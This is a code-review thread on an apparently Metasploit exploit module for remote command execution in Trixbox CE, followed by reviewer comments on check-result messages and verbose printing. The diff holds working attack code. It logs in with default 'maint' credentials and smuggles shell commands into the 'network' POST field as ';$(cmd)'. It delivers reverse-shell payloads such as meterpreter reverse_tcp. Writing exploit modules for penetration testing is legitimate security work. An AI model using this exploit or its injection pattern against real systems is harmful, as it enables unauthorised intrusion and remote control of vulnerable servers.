modules/exploits/unix/webapp/trixbox_ce_endpoint_devicemap_rce.rb

```diff
@@ -0,0 +1,182 @@
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            ],
+            [
+              'Automatic (Unix In-Memory)',
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'Type' => :unix_memory
+            ]
+          ],
+        'Privileged' => false,
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'User to login with', 'maint']),
+        OptString.new('HttpPassword', [ true, 'Password to login with', 'password']),
+      ]
+    )
+  end
+
+  def user
+    datastore['HttpUsername']
+  end
+
+  def pass
+    datastore['HttpPassword']
+  end
+
+  def get_target(res)
+    version = res.body.scan(/v(\d\.\d)/).flatten.first
+    print_good("#{peer} - Trixbox CE v#{version}.x identified.")
+    if Gem::Version.new(version).between?(Gem::Version.new('2.6'), Gem::Version.new('2.8'))
+      @uri = normalize_uri(target_uri.path, '/maint/modules/endpointcfg/endpoint_devicemap.php')
+    elsif Gem::Version.new(version).between?(Gem::Version.new('2.0'), Gem::Version.new('2.4'))
+      @uri = normalize_uri(target_uri.path, '/maint/modules/11_endpointcfg/endpoint_devicemap.php')
+    elsif Gem::Version.new(version) == Gem::Version.new('1.2')
+      @uri = normalize_uri(target_uri.path, '/maint/endpoint_devicemap.php')
+    else
+      return nil
+    end
+    return version
+  end
+
+  def login(user, pass, _opts = {})
+    uri = normalize_uri(target_uri.path, '/maint/')
+    print_status("#{peer} - Authenticating using \"#{user}:#{pass}\" credentials...")
+    res = send_request_cgi({
+      'uri' => uri,
+      'method' => 'GET',
+      'authorization' => basic_auth(user, pass)
+    })
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed.')
+    end
+    if res.code == 200
+      print_good("#{peer} - Authenticated successfully.")
+      return res
+    elsif res.code == 401
+      fail_with(Failure::NoAccess, 'Authentication failed.')
+    else
+      fails_with(Failure::UnexpectedReply, "The host responded with an unexpected status code: #{res.code}.")
+    end
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'authorization' => basic_auth(user, pass),
+      'vars_post' => {
+        'network' => ";$(#{cmd})"
+      }
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def check
+    res = login(user, pass)
+    unless res
+      vprint_error 'Connection failed.'
+      return CheckCode::Detected
+    end
+    version = get_target(res)
+    if version.nil?
+      return CheckCode::Safe
```

Comment:
Every other case I see your outputting a line before returning a `CheckCode` code, so can we update this line to print out a message using `print_error` before we execute `return CheckCode::Safe`?

Reply:
You can also do `CheckCode::Safe('This is the reason.')` to automatically print the reason when running `check` directly.

Reply:
Updated

Reply:
A lot of people don't run with `datastore[VERBOSE]` set to `TRUE`, so all of these `vprint_error` or commands in the format of `vprint_XXXX` won't ever be executed unless this is set. This is not what we want, as we want the user to always recieve info about errors. Status updates, however, can be optionally displayed via `vprint_status` **if they are not essential**, however, most of the time this is not the case and one should just use `print_status` as per normal.

Reply:
Also for reference this is the code that will be run when you execute `vprint_error`:

```
def vprint_error(msg='')
    print_error(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE'])
end
```
Taken from lib/msf/core/module/ui/message/verbose.rb